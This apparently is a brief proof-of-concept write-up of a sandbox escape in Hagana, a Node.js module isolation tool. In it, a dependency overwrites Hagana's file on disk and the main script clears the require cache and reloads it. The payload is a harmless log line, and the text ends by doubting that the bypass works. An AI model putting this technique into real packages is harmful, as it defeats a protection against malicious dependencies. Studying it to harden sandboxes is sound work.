hagana
Hagana overwrite break out
This one is relatively simple.
Since Hagana is probably installed in the same node_modules
directory as the potentially dangerous modules, it's possible to overwrite it and reload the module.
Main file ./src/index.js
content:
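// Load and configure Hagana before any third-party code runs
const hagana = require('@hagana/hagana');
hagana.setModulesFolder('node_modules');
hagana.setRoot('.');
// The third-party module runs here and overwrites Hagana's file on disk
const { run } = require('mylib');
run();
// Drop the cached copy and require again: the overwritten file is what loads now
delete require.cache[require.resolve('@hagana/hagana')];
require('@hagana/hagana');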
The dangerous library ./node_modules/mylib/index.js
content:
const fs = require('fs');
exports.run = function run () {
  // Replace the file that '@hagana/hagana' resolves to with arbitrary code
  fs.writeFileSync(require.resolve('@hagana/hagana'), 'console.log("Yolooo");', { encoding: 'utf-8' });
};
But won't the initial overrides already have taken place?